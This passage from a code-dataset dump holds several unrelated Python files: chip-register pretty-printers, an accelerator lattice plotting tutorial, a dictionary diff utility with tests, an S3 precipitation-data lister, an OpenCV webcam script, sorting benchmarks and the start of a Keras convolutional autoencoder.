If True,\n then return a Group object (as used in reports)\n \"\"\"\n\n columns = ['field', 'bits', 'value']\n table = Table(headings=columns)\n\n for reg_name, value in self.core_regs_dict.items():\n reg = self.core.field_refs[\"REGFILE_{}\".format(reg_name.upper())]\n bits = \"[{}:{}]\".format(reg.info.start_bit, reg.info.stop_bit - 1)\n\n hex_padding = (reg.info.stop_bit - reg.info.start_bit) // 4\n hex_value = \"0x{:0{}x}\".format(value, hex_padding)\n\n row = [reg_name.upper(), bits, hex_value]\n table.add_row(row)\n\n output = Group(\"Kalimba Core Registers\")\n output.append(table)\n if report:\n return output\n return StringTextAdaptor(output)\n\n def _generate_report_body_elements(self):\n return [self._print_registers(report=True)]\n\n def __repr__(self):\n return self._print_registers()\n\n\nclass ArmExecState(BaseExecState):\n \"\"\"\n Execution state of ARM cores.\n \"\"\"\n\n @property\n def r(self):\n 'General indexable register'\n #pylint: disable=invalid-name\n return self.core.r\n\n @property\n def sp(self):\n 'Accessor to Stack Pointer (SP) register'\n return self.core.sp\n\n @property\n def lr(self):\n 'Accessor to Link Register (LR)'\n return self.core.lr\n\n @property\n def pc(self):\n 'Accessor to Program Counter (PC) register'\n return self.core.pc\n\n def _populate_registers(self, registers):\n \"\"\"\n Over-ridable that fills registers Ordered Dictionary with values\n ready for reporting in self._print_registers\n \"\"\"\n # Note that there are 3 specially named registers: SP, LR and PC\n for index in range(self.core.RegNames.NUM_UNNAMED_REGS):\n registers[\"r{}\".format(index)] = self.r[index]\n registers['sp'] = self.sp\n registers['lr'] = self.lr\n registers['pc'] = self.pc\n\n def _analyse_registers(self, registers, output):\n \"\"\"\n Analyse the register info and modify output by appending\n any appropriate anomalies to it.\n \"\"\"\n\n def _print_registers(self, report=False):\n \"\"\"\n Pretty print method for displaying the registers.\n\n p: report If False, then return output as a string. If True,\n then return a Group object (as used in reports)\n \"\"\"\n\n columns = ['field', 'bits', 'value', 'note']\n output = Group(\"ARM Core Registers\")\n table = Table(headings=columns)\n anomalies = []\n # Create dictionary mapping names to registers.\n # Special ones are chip-specific and added here as well.\n registers = OrderedDict()\n try:\n self._populate_registers(registers)\n except RegistersUnavailable:\n anomalies.append(Warn(\n 'ARM register definitions unavailable: '\n 'you may want to check why. \\n'\n 'This affects identification of '\n 'live_stack (needs PSP) and stack usage (needs PC). 
\\n'\n 'PC value of 0 will be falsely reported as possibly asleep.'))\n output.extend(anomalies)\n # abort processing\n else:\n output.extend(anomalies)\n for reg_name, value in registers.items():\n # All registers are 32 bit\n bits = \"0: 31\"\n if isinstance(value, tuple):\n value, note = value\n else:\n note = ''\n hex_value = \"0x{:0X}\".format(value)\n row = [reg_name.upper(), bits, hex_value, note]\n table.add_row(row)\n self._analyse_registers(registers, output)\n output.append(table)\n if report:\n return output\n return StringTextAdaptor(output)\n\n def _generate_report_body_elements(self):\n return [self._print_registers(report=True)]\n\n def __repr__(self):\n return self._print_registers()\n\nclass CortexM0ExecState(ArmExecState):\n \"\"\"\n Execution state of ARM CortexM0 cores.\n \"\"\"\n # Meanings of exception number in IPSR[0:6],\n # this holds the exception number or the current IRQ\n IPSR_EXCEPTION_IRQ0 = 16 # lowest value of exception number in IPSR\n IPSR_EXCEPTION_IRQ_COUNT = 32 # implementation defined number of IRQs\n # highest IRQ exception number in IPSR:\n IPSR_EXCEPTION_IRQ_MAX = IPSR_EXCEPTION_IRQ0 + IPSR_EXCEPTION_IRQ_COUNT\n IPSR_EXCEPTION_THREADMODE = 0\n IPSR_EXCEPTION_NMI = 2\n IPSR_EXCEPTION_HARDFAULT = 3\n IPSR_EXCEPTION_SVCALL = 11\n IPSR_EXCEPTION_PENDSV = 14\n IPSR_EXCEPTION_SYSTICK = 15\n _ipsr_exception_names = {\n 0:\"Thread mode\",\n 1:\"Reserved\",\n 2:\"NMI\",\n 3:\"HardFault\",\n 4:\"Reserved\",\n 5:\"Reserved\",\n 6:\"Reserved\",\n 7:\"Reserved\",\n 8:\"Reserved\",\n 9:\"Reserved\",\n 10:\"Reserved\",\n 11:\"SVCall\",\n 12:\"Reserved\",\n 13:\"Reserved\",\n 14:\"PendSV\",\n 15:\"SysTick\",\n 16:\"IRQ0\",\n # ... n+15 = IRQ(n-1); n is implementation defined; range 1-32\n # n .. 63, \"Reserved\"\n }\n\n def ipsr_exception_name(self, number):\n '''\n Looks up meaning of an IPSR exception number and returns a string\n describing it. 
This includes the IRQ bits.\n        Does not read the value from register: it is supplied in number.\n        '''\n        try:\n            return self._ipsr_exception_names[number]\n        except KeyError:\n            if self.IPSR_EXCEPTION_IRQ0 < number < self.IPSR_EXCEPTION_IRQ_MAX:\n                # one-off population of rest of IRQ descriptors\n                for i in range(\n                        self.IPSR_EXCEPTION_IRQ0,\n                        self.IPSR_EXCEPTION_IRQ0+self.IPSR_EXCEPTION_IRQ_COUNT):\n\n                    self._ipsr_exception_names[i] = (\"IRQ\" + str(\n                        i - self.IPSR_EXCEPTION_IRQ0))\n                for i in range(\n                        self.IPSR_EXCEPTION_IRQ0+self.IPSR_EXCEPTION_IRQ_COUNT,\n                        64):\n                    self._ipsr_exception_names[i] = \"Reserved\"\n                return self._ipsr_exception_names[number]\n            raise\n\n    @property\n    def xpsr(self):\n        '''\n        Accessor to CortexM0 combined extended program status register (XPSR),\n        which combines APSR/EPSR/IPSR information.\n        '''\n        return self.core.xpsr\n\n    @staticmethod\n    def ipsr_exception(ipsr):\n        '''\n        The part of ipsr containing iPSR exception number is in bottom 6 bits.\n        Does not read register; uses value passed in ipsr.\n        '''\n        # Potential extension: need a better way of representing the bits in this register\n        CORTEXM0_IPSR_EXCEPTION_MASK = 0x3F  # pylint: disable=invalid-name\n        return ipsr & CORTEXM0_IPSR_EXCEPTION_MASK\n\n    @property\n    def msp(self):\n        'Accessor to CortexM0 main stack pointer (MSP); banked in SP'\n        return self.core.msp\n\n    @property\n    def psp(self):\n        'Accessor to CortexM0 process stack pointer (PSP); banked in SP'\n        return self.core.psp\n\n    @property\n    def special(self):\n        '''\n        Accessor to CortexM0 special registers:\n        PRIMASK/FAULTMASK/BASEPRI/CONTROL\n        '''\n        return self.core.special\n\n    def dhcsr(self):\n        'Accessor to the Debug Halt Control Status Register (DHCSR)'\n        return self.core.dhcsr\n\n    def _analyse_registers(self, registers, output):\n        \"\"\"\n        Analyse the register info and modify output by appending\n        any appropriate anomalies to it.\n        \"\"\"\n        # Get some register info (without re-reading register)\n        dhcsr_reg = self.core.arm_regs.DHCSR\n        if registers['dhcsr'] & dhcsr_reg.S_SLEEP.mask:\n            output.append(Text(\n                'DHCSR.CORTEX_M0_S_SLEEP bit is set, hence many registers '\n                'are zero while the chip naps or sleeps: \\n'\n                'a value read at that instant would '\n                'be returned as zero.'))\n\n    def _populate_registers(self, registers):\n        \"\"\"\n        Over-ridable that fills registers Ordered Dictionary with values\n        ready for reporting in self._print_registers\n        \"\"\"\n        ArmExecState._populate_registers(self, registers)\n        # There are more specially named registers to add here:\n        xpsr = self.xpsr\n        registers['xpsr'] = (xpsr, self.ipsr_exception_name(\n            self.ipsr_exception(xpsr)))\n        registers['msp'] = self.msp\n        registers['psp'] = self.psp\n        # The one between psp and special is reserved so not displayed\n        registers['special'] = self.special\n        # rest of banked registers are reserved so not displayed\n        registers['dhcsr'] = self.core.dhcsr.read()\n\n    def _generate_report_body_elements(self):\n        output = self._print_registers(report=True)\n        # Note that __repr__ doesn't give you this more detailed report\n\n        # Here add DHCSR, maybe later add others like CONTROL and SPECIAL\n        try:\n            output.append(bitz_engine(\n                self.core.dhcsr, report=True, value=self.core.dhcsr.read()))\n        except RegistersUnavailable:\n            output.append(Warn('DHCSR register definition unavailable'))\n        else:\n            if self.core.subsystem.chip.device.transport is None:  # a coredump\n                output.append(Text(\n                    'Note this shows the saved value of DHCSR before coredump '\n                    'halted the chip. 
\\nThe memory mapped register value in '\n 'bt.arm_regs.CORTEXM0_DCB_DHCSR may differ.'))\n\n return [output]\n\nclass XapExecState(BaseExecState):\n \"\"\"\n Execution state of XAP cores.\n \"\"\"\n # A lot of property names are named after register names which are usually\n # very short and upset pylint, so shut it up:\n #pylint: disable=invalid-name\n\n @property\n def pc(self):\n 'Accessor to Program Counter (PC) register'\n return self.core.pc\n\n @property\n def xl(self):\n 'Accessor to XL register'\n return self.core.xap_uxl\n\n @property\n def xh(self):\n 'Accessor to XH register'\n return self.core.xap_uxh\n\n @property\n def y(self):\n 'Accessor to Y register'\n return self.core.xap_uy\n\n @property\n def ah(self):\n 'Accessor to AH register'\n return self.core.xap_ah\n\n @property\n def al(self):\n 'Accessor to AL register'\n return self.core.xap_al\n\n def _print_registers(self, report=False):\n \"\"\"\n Pretty print method for displaying the registers.\n\n p: report If False, then return output as a string. If True,\n then return a Group object (as used in reports)\n \"\"\"\n\n columns = ['field', 'bits', 'value']\n t = Table(headings=columns)\n\n reg_sizes = OrderedDict()\n reg_sizes['uxl'] = 16\n reg_sizes['uxh'] = 8\n reg_sizes['uy'] = 16\n reg_sizes['al'] = 16\n reg_sizes['ah'] = 16\n reg_sizes['ixl'] = 16\n reg_sizes['ixh'] = 8\n reg_sizes['iy'] = 16\n\n for reg_name, length in sorted(reg_sizes.items(),\n key=operator.itemgetter(0)):\n reg = self.core.fields[\"XAP_{}\".format(reg_name.upper())]\n # xap registers are 16 bit\n bits = \"[0:{}]\".format(length - 1)\n\n hex_value = \"0x{:04x}\".format(reg)\n\n row = [reg_name.upper(), bits, hex_value]\n t.add_row(row)\n\n t.add_row(['PC', \"[0:23]\", \"0x{:08x}\".format(self.pc)])\n\n output = Group(\"XAP Core Registers\")\n output.append(t)\n if report:\n return output\n return StringTextAdaptor(output)\n\n def _generate_report_body_elements(self):\n return [self._print_registers(report=True)]\n\n def __repr__(self):\n return self._print_registers()\n","repo_name":"xiaokun9/qcc_tool","sub_path":"venv/Lib/site-packages/csr/dev/hw/core/execution_state.py","file_name":"execution_state.py","file_ext":"py","file_size_in_byte":14048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"21395711878","text":"\"\"\"\n\n.. 
_demo-accelerator-lattice:\n\n===================\nAccelerator Lattice\n===================\n\nThis example shows how to use the `~.plotting.lattice.plot_latwiss` function\nto represent your machine's layout and optics functions in a double-axis plot.\n\nIn this example, we will showcase the functionality on a simple lattice, and then demonstrate the use\nof several parameters to control the plot on the example case of the LHC.\n\"\"\"\nimport matplotlib.pyplot as plt\n\nfrom cpymad.madx import Madx\n\nfrom pyhdtoolkit.cpymadtools import lhc, matching\nfrom pyhdtoolkit.cpymadtools._generators import LatticeGenerator\nfrom pyhdtoolkit.plotting.lattice import plot_latwiss\nfrom pyhdtoolkit.plotting.styles import _SPHINX_GALLERY_PARAMS\nfrom pyhdtoolkit.utils import logging\n\nlogging.config_logger(level=\"error\")\nplt.rcParams.update(_SPHINX_GALLERY_PARAMS) # for readability of this tutorial\n\n###############################################################################\n# Let's start by generating a simple lattice and setup your simulation:\n\nn_cells: int = 24\nbase_lattice: str = LatticeGenerator.generate_base_cas_lattice()\n\nmadx = Madx(stdout=False)\nmadx.input(base_lattice)\n\nmatching.match_tunes_and_chromaticities(\n madx,\n sequence=\"CAS3\",\n q1_target=6.335,\n q2_target=6.29,\n dq1_target=100,\n dq2_target=100,\n varied_knobs=[\"kqf\", \"kqd\", \"ksf\", \"ksd\"],\n)\n\n###############################################################################\n# Plotting the combined machine layout and optics functions is done in a single call\n# to the `~.plotting.lattice.plot_latwiss` function. Here, we will also set the *k0l_lim*\n# parameter to control the right-hand-side axis in the machine layout axis. The same\n# can be done with the *k1_lim* parameter.\n\nmu_x_cell = madx.table.summ.Q1[0] / n_cells\nmu_y_cell = madx.table.summ.Q2[0] / n_cells\ntitle = rf\"Base Lattice, $\\mu_{{x, cell}}={mu_x_cell:.3f}, \\ \\mu_{{y, cell}}={mu_y_cell:.3f}$\"\n\nplt.figure(figsize=(18, 11))\nplot_latwiss(madx, title=title, k0l_lim=(-0.15, 0.15), k1l_lim=(-0.08, 0.08), disp_ylim=(-10, 125), lw=3)\nplt.tight_layout()\nplt.show()\n\nmadx.exit()\n\n###############################################################################\n# One can customise the plot more to their liking or needs thanks to the other\n# function parameters. Let's showcase this with the LHC lattice, that we set up\n# below.\n#\n# .. important::\n# This example requires the `acc-models-lhc` repository to be cloned locally. One\n# can get it by running the following command:\n#\n# .. code-block:: bash\n#\n# git clone -b 2022 https://gitlab.cern.ch/acc-models/acc-models-lhc.git --depth 1\n#\n# Here I set the 2022 branch for stability and reproducibility of the documentation\n# builds, but you can use any branch you want.\n\nlhc_madx: Madx = lhc.prepare_lhc_run3(\n opticsfile=\"acc-models-lhc/operation/optics/R2022a_A30cmC30cmA10mL200cm.madx\",\n stdout=False\n)\n\n###############################################################################\n# The `~.plotting.lattice.plot_latwiss` function gives the possibility to zoom on\n# a region by providing the *xlimits* parameter. 
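The limits are given in the machine's longitudinal ``s`` coordinate, in meters. 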
Let's first determine the position\n# of points of interest through the ``TWISS`` table:\n\nlhc_madx.command.twiss()\ntwiss_df = lhc_madx.table.twiss.dframe()\ntwiss_df.name = twiss_df.name.apply(lambda x: x[:-2])\nip1s = twiss_df.s[\"ip1\"]\n\n###############################################################################\n# We can now focus the plot on Interaction Region 1 by providing *xlimits*\n# centered around the value we determined for *ip1s*.\n#\n# .. tip::\n#     In order to zoom on a region, one might be tempted to call the plot and run ``plt.xlim(...)``.\n#     However, when providing the *xlimits* parameter, `~.plotting.lattice.plot_latwiss` makes a sub-selection\n#     of the ``TWISS`` table before doing any plotting. This provides a nice speedup to the plotting\n#     process, as only elements within the limits are rendered on the layout axis, instead of all elements\n#     (which can be a lot, and quite lengthy for big machines such as the LHC). It is therefore the recommended\n#     way to zoom on a region.\n\nplt.figure(figsize=(18, 11))\nplot_latwiss(\n    lhc_madx,\n    title=\"Interaction Region 1\",\n    disp_ylim=(-0.5, 2.5),\n    xlimits=(ip1s - 457, ip1s + 457),\n    k0l_lim=(-1.3e-2, 1.3e-2),\n    k1l_lim=(-6.1e-2, 6.1e-2),\n    lw=1.5,\n)\nplt.axvline(x=ip1s, color=\"grey\", ls=\"--\", lw=1.5, label=\"IP1\")\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# Using the *xoffset* parameter, one can shift the longitudinal coordinate to be\n# centered on 0, with the horizontal axis showing relative position to the given\n# *xoffset*. This is useful here to zoom closely on IP1 and see the elements'\n# positions relative to the IP marker.\n\nplt.figure(figsize=(18, 11))\nplot_latwiss(\n    lhc_madx,\n    title=\"IP1 Surroundings\",\n    disp_ylim=(-3e-2, 3e-2),\n    xoffset=ip1s,\n    xlimits=(-85, 85),\n    k0l_lim=(-4e-4, 4e-4),\n    k1l_lim=(-6e-2, 6e-2),\n    lw=1.5,\n)\nplt.axvline(x=0, color=\"grey\", ls=\"--\", lw=1.5, label=\"IP1\")\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# When and only when the *k2l_lim* parameter is provided, the sextupolar elements\n# are plotted on the lattice layout axis, and an additional scale is put to the right.\n# This is useful to see sextupoles when zooming in, which you would not necessarily\n# want to plot when looking at the big picture, to avoid overcrowding it. Similarly,\n# providing the *plot_bpms* parameter will add a small marker for BPM elements. Here it is\n# showcased when looking at an LHC arc cell:\n\nplt.rcParams.update({\"axes.formatter.limits\": (-2, 5)})  # convenience\nplt.figure(figsize=(18, 11))\nplot_latwiss(\n    lhc_madx,\n    title=\"LHC Arc Cell\",\n    plot_bpms=True,\n    disp_ylim=(-0.5, 20),\n    beta_ylim=(0, 200),\n    k0l_lim=(-3e-2, 3e-2),\n    k1l_lim=(-4e-2, 4e-2),\n    k2l_lim=(-5e-2, 5e-2),\n    lw=1.5,\n    xlimits=(14_084.5, 14_191.3),\n)\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# Let's not forget to close the RPC connection to ``MAD-X``:\n\nlhc_madx.exit()\n\n#############################################################################\n#\n# .. 
admonition:: References\n#\n# The use of the following functions, methods, classes and modules is shown\n# in this example:\n#\n# - `~.cpymadtools.lhc`: `~.lhc._setup.prepare_lhc_run3`, `~.lhc._setup.setup_lhc_orbit`\n# - `~.cpymadtools.generators`: `~.generators.LatticeGenerator`\n# - `~.cpymadtools.matching`: `~.matching.match_tunes_and_chromaticities`\n# - `~.plotting.lattice`: `~.plotting.lattice.plot_latwiss`\n","repo_name":"fsoubelet/PyhDToolkit","sub_path":"examples/demo_lattice.py","file_name":"demo_lattice.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"25048963139","text":"from typing import Dict, Hashable, Union, Tuple, Any\nfrom pprint import pprint\nfrom copy import deepcopy\nimport unittest\n\n\nclass DictTuple(tuple):\n \"\"\"Used for separating from regular tuples\"\"\"\n\n def __repr__(self):\n return f\"#{super().__repr__()[1:-1]}#\"\n\n\nclass _Undefined:\n \"\"\"Flag for non-existing value\"\"\"\n\n def __repr__(self):\n return \"undefined\"\n\n\nundefined = _Undefined()\n\n\ndef recursiveitems(d: Dict):\n for key, val in d.items():\n if type(val) == dict:\n yield (key, DictTuple(recursiveitems(val)))\n elif type(val) == list:\n yield (key, tuple(val))\n else:\n yield (key, val)\n\n\ndef difference(a: Dict, b: Dict):\n a_set = set(recursiveitems(a))\n b_set = set(recursiveitems(b))\n diffs = a_set.symmetric_difference(b_set)\n changes = {}\n for key, val in diffs:\n if type(val) == DictTuple:\n changes[key] = difference(a.get(key, undefined), b.get(key, undefined))\n else:\n changes[key] = (a.get(key, undefined), b.get(key, undefined))\n\n return changes\n\n\ndef _apply(\n d: Dict,\n changes: Dict[Hashable, Union[Tuple[Any, Any], Dict]],\n delete: bool,\n add: bool,\n update: bool,\n):\n for key, val in changes.items():\n if type(val) == dict:\n _apply(d.get(key), val, delete, add, update)\n continue\n\n before, after = val\n if delete and (after is undefined):\n del d[key]\n continue\n\n if (add and (before is undefined)) or update:\n d[key] = after\n continue\n\n return d\n\n\ndef apply(\n d: Dict,\n diff: Dict[Hashable, Union[Tuple[Any, Any], Dict]],\n *,\n delete: bool = True,\n add: bool = True,\n update: bool = True,\n mutate: bool = False,\n):\n target = d if mutate else deepcopy(d)\n result = _apply(target, diff, delete, add, update)\n return None if mutate else result\n\n\nclass Test(unittest.TestCase):\n def test_recursiveitems(self):\n d = {\n \"a\": 1,\n \"b\": \"A string\",\n \"c\": (1, 2, 3),\n \"d\": [4, 5, 6],\n \"e\": {\n \"f\": None,\n },\n }\n\n items = list(recursiveitems(d))\n expected = [\n (\"a\", 1),\n (\"b\", \"A string\"),\n (\"c\", (1, 2, 3)),\n (\"d\", (4, 5, 6)),\n (\"e\", DictTuple([(\"f\", None)])),\n ]\n\n self.assertListEqual(items, expected)\n\n a = {\n \"a\": 1,\n \"b\": \"A string\",\n \"c\": (1, 2, 3),\n \"d\": [1, 2, 3],\n \"e\": {\n \"f\": 1,\n \"g\": {},\n },\n \"i\": {\n \"j\": 1,\n \"k\": {\"l\": 0},\n },\n \"m\": 123,\n \"n\": frozenset((7, 6, 8)),\n }\n\n b = {\n \"a\": 1,\n \"b\": \"A string!!!\",\n \"c\": (1, 2, 3),\n \"d\": [2, 4],\n \"e\": {\n \"f\": 1,\n \"g\": {\"h\": \"help\"},\n },\n \"i\": {\n \"j\": 43,\n \"k\": {\"l\": 0},\n },\n \"n\": frozenset((9, 8)),\n }\n\n diff = {\n \"b\": (\"A string\", \"A string!!!\"),\n \"d\": ([1, 2, 3], [2, 4]),\n \"e\": {\n \"g\": {\n \"h\": (undefined, \"help\"),\n },\n },\n \"i\": {\n \"j\": (1, 43),\n },\n \"m\": (123, undefined),\n \"n\": (frozenset((7, 6, 8)), frozenset((9, 
8))),\n }\n\n def test_diff(self):\n diff = difference(self.a, self.b)\n self.assertDictEqual(diff, self.diff)\n\n def test_apply(self):\n b = apply(self.a, self.diff)\n self.assertDictEqual(b, self.b)\n\n def test_apply_mutate(self):\n a = deepcopy(self.a)\n apply(a, self.diff, mutate=True)\n self.assertDictEqual(a, self.b)\n\n def test_apply_update_only(self):\n a = {\n \"a\": {\n \"delete\": 1,\n \"update\": 3,\n },\n }\n\n diff = {\n \"a\": {\n \"delete\": (1, undefined),\n \"update\": (3, 2),\n \"add\": (undefined, 123),\n }\n }\n\n b = apply(a, diff)\n expected = {\n \"a\": {\"update\": 2, \"add\": 123},\n }\n\n self.assertDictEqual(b, expected)\n\n def test_apply_delete_only(self):\n a = {\n \"a\": {\n \"delete\": 1,\n \"update\": 3,\n },\n }\n\n diff = {\n \"a\": {\n \"delete\": (1, undefined),\n \"update\": (3, 2),\n \"add\": (undefined, 123),\n }\n }\n\n b = apply(a, diff, update=False, add=False)\n expected = {\n \"a\": {\n \"update\": 3,\n },\n }\n\n self.assertDictEqual(b, expected)\n\n def test_apply_add_only(self):\n a = {\n \"a\": {\n \"delete\": 1,\n \"update\": 3,\n },\n }\n\n diff = {\n \"a\": {\n \"delete\": (1, undefined),\n \"update\": (3, 2),\n \"add\": (undefined, 123),\n }\n }\n\n b = apply(a, diff, update=False, delete=False)\n expected = {\n \"a\": {\n \"delete\": 1,\n \"update\": 3,\n \"add\": 123,\n },\n }\n\n self.assertDictEqual(b, expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Napam/JallaResearch","sub_path":"dictdiff/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"29797426534","text":"#\tAngkan Biswas\n#\t10.04.2020\n#\tCapture a video file.\n\nimport cv2\nimport numpy as np\n\ncamera = cv2.VideoCapture(0)\t\t\t\t\t\t\t#\tOpen a cemera.\n\nfor i in range(100): \n\t_, frame = camera.read()\t\t\t\t\t\t#\tTake a frame.\n\t\n\tresizeFrame = cv2.resize(frame,(300,200))\t\t\t\t# \tResize the freame.\n\tnegativeFrame = 255 - resizeFrame\t\t\t\t\t#\tNegative frame\n\tconcateFrame = np.concatenate((resizeFrame, negativeFrame), axis = 1) \t#\tAdd two frames side by side\n\t\n\tcv2.imshow('My Face',concateFrame)\t\t\t\t\t#\tDisplay the frame.\n\tcv2.waitKey(10)\t\t\t\t\t\t\t\t#\tHold the display window for 50 millisecond\n\ncamera.release()\t\t\t\t\t\t\t\t#\tRelease the captured camera\n\n\n\n\n\n\n\n\n\n\n","repo_name":"BiswasAngkan/OpenCV","sub_path":"MakeVideoFile_Positive_Negative.py","file_name":"MakeVideoFile_Positive_Negative.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37601401764","text":"import os\nimport datetime\nfrom tqdm import tqdm\nimport pandas as pd\n\nimport boto3\n\nDICT_GSMAP_UNIT = {\n 'Latitude': 'degrees',\n 'Longitude': 'degrees',\n 'hourlyPrecipRate': 'mm/hr',\n 'hourlyPrecipRateGC': 'mm/hr',\n 'monthlyPrecipRate': 'mm/hr',\n 'monthlyPrecipRateGC': 'mm/hr',\n 'standardDeviation': 'mm/hr',\n 'gaugeQualityInfo': 'counts/day',\n 'snowProbability': '%'\n}\n\nEXT = ['.h5', '.hdf', '.HDF', '.tif']\n\ndef get_meta_list_GSMaP(s3_bucket_name, s3_dir_parent):\n s3 = boto3.resource('s3')\n bucket = s3.Bucket(s3_bucket_name)\n s3_cl = boto3.client('s3')\n bucket_location = s3_cl.get_bucket_location(Bucket=s3_bucket_name)\n\n list_path = []\n for bucket_object in bucket.objects.filter(Prefix=s3_dir_parent):\n list_path.append(bucket_object.key)\n\n list_dict_meta = []\n for path in 
tqdm(list_path):\n filename = os.path.basename(path)\n if os.path.splitext(filename)[-1] not in EXT:\n continue\n\n filename_part = filename.split('_')\n dict_info = {\n 'filename': filename,\n 'mission_id': filename_part[0],\n 'sensor_id': filename_part[1],\n 'scene_start_datetime': filename_part[2],\n 'process_unit': filename_part[3],\n 'process_level': filename_part[4],\n 'product_version': filename_part[6],\n 'bucket_name': s3_bucket_name,\n 'path': path,\n 'url': \"https://{0}.s3-{1}.amazonaws.com/{2}\".format(s3_bucket_name,\n bucket_location['LocationConstraint'], path)\n }\n if dict_info['process_unit'] == 'H':\n dict_info['scene_start_datetime'] = datetime.datetime.strptime(dict_info['scene_start_datetime'],\n '%y%m%d%H%M')\n dict_info['process_unit'] = 'Hourly'\n elif dict_info['process_unit'] == 'M':\n dict_info['scene_start_datetime'] = datetime.datetime.strptime(dict_info['scene_start_datetime'], '%y%m')\n dict_info['process_unit'] = 'Monthly'\n\n if dict_info['process_level'][-1] == 'S':\n dict_info['process_level'] = 'Standard'\n elif dict_info['process_level'][-1] == 'N':\n dict_info['process_level'] = 'Near real time'\n\n if len(filename_part) >= 9:\n dict_info['group_name'] = filename_part[7]\n dict_info['element'] = filename_part[8]\n dict_info['unit'] = DICT_GSMAP_UNIT.get(dict_info['element'], '')\n if len(filename_part) >= 11:\n dict_info['epsg_code'] = int(filename_part[9])\n dict_info['region_name'] = filename_part[10]\n\n list_dict_meta.append(dict_info)\n\n df = pd.DataFrame.from_dict(list_dict_meta)\n return df\n","repo_name":"DeepHTS/Data-GSMaP","sub_path":"src/s3_metainfo.py","file_name":"s3_metainfo.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26010423014","text":"# Find the number of seconds it takes to run any operation\n# Output it in a format that can be graphed in google sheets\n\nfrom time import time\nimport random\n\n\n\n# STRETCH: implement the Bubble Sort function below\ndef bubble_sort( arr ):\n # Repeat this until you make it through an entire pass without any swaps.\n is_sorted = False\n while not is_sorted:\n is_sorted = True\n # Walk through the array\n for i in range(len(arr) - 1):\n # comparing each element to its right neighbor.\n # If it's smaller than that neighbor,\n if arr[i] > arr[i + 1]:\n # swap the elements.\n arr[i], arr[i+1] = arr[i+1], arr[i]\n is_sorted = False\n # return arr\n\n\n\n# TO-DO: implement the Insertion Sort function below\ndef insertion_sort( arr ):\n # For each element after the first\n for i in range(1, len(arr)):\n # Find the right spot for the element in the sorted sub-array on the left\n # Insert it there:\n # Store the current element\n current_element = arr[i]\n # walk backwards through the sublist, shifting elements to the right by 1\n j = i - 1\n while j >= 0 and current_element < arr[j]:\n arr[j + 1] = arr[j]\n j -= 1\n # Until we reach a smaller or equal element, then put the current element in that place\n arr[j+1] = current_element\n return arr\n\n\n\nl = [random.randint(0, 1000) for i in range(0, 10000)]\n\nstart_time = time()\n# Run our code\nbubble_sort(l)\n# Store the ending time\nend_time = time()\nprint (f\"Quadratic runtime: {end_time - start_time} seconds\")\n\n\nl = [random.randint(0, 1000) for i in range(0, 10000)]\n\ninputSizes = [i * 100 for i in range(1, 30)]\ntimes = []\n\nfor inputSize in inputSizes:\n print(f\"running: {inputSize}\")\n l = [random.randint(0, 1000) for i in 
range(0, inputSize)]\n # Store a starting time\n start_time = time()\n # Run our code\n insertion_sort(l)\n # Store the ending time\n end_time = time()\n # Print out the ending time - starting time\n times.append(end_time - start_time)\n\n\nprint(\"LENGTHS\")\nfor element in inputSizes:\n print(element)\n\nprint(\"TIMES\")\nfor t in times:\n print(t)\n\n\n\n\n\n","repo_name":"br80/lambda_cs","sub_path":"timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"21791158104","text":"import numpy as np\n\nfrom keras import optimizers\n\nfrom keras.models import Model\n\nfrom keras.layers import Input, Dense, Flatten, MaxPooling2D, UpSampling2D, Reshape, BatchNormalization, Conv2D\n\nfrom .model_utils import activation_function\n\nfrom habitat_modelling.ml.keras.models.blocks import resnet_inception_block, inception_downsample, inception_block, conv_block_downsample, deconv_block_upsample, dense_block, conv_block\n\n\n\nclass ConvAutoEncoder:\n \"\"\"\n ConvAutoEncoder: A convolutional autoencoder for use with image inputs.\n\n To Use:\n cae = ConvAutoEncoder(image_shape=(256,256,3),\n latent_dim=100,\n downsampling=args.downsampling,\n block_filters=[64,64,64,32,32],\n batch_norm=args.batch_norm,\n activation_cfg=activation_cfg)\n\n cae.create_model()\n cae.compile()\n cae.aa.train_on_batch(X,X)\n\n \"\"\"\n def __init__(self,\n image_shape,\n conv_filters,\n latent_dim,\n downsampling='stride',\n block_type='plain',\n lr=1e-4,\n loss='mean_squared_error',\n activation_cfg=None,\n batch_norm=False,\n encoder_weights=None,\n generator_weights=None):\n \"\"\"\n Initialises the autoencoder with the default parameters\n Args:\n image_shape: (tuple) The image shape to be used. Height,width must be divisible by 2**len(block_filters).\n block_filters: (list) the number of filters in each block. Length of the list is equal to amount of downsampling.\n latent_dim: (int) the number of units in the latent dimension\n downsampling: (str) The downsampling strategy to use. Either 'pool' or 'stride'.\n block_type: (str) The type of network block to use, options are {plain, inception, inception_downsample, resnet_inception}.\n lr: (float) The learning rate for the model\n loss: (str) The loss function used, options are {mean_squared_error}\n activation_cfg: (dict) Configure the activations used. If None, uses ReLU.\n batch_norm: (bool) Whether to use batch norm\n encoder_weights: (str) Path to the weights to load into the encoder. Loads by name so doesn't have to match.\n generator_weights: (str) Path to the weights to load into the generator. 
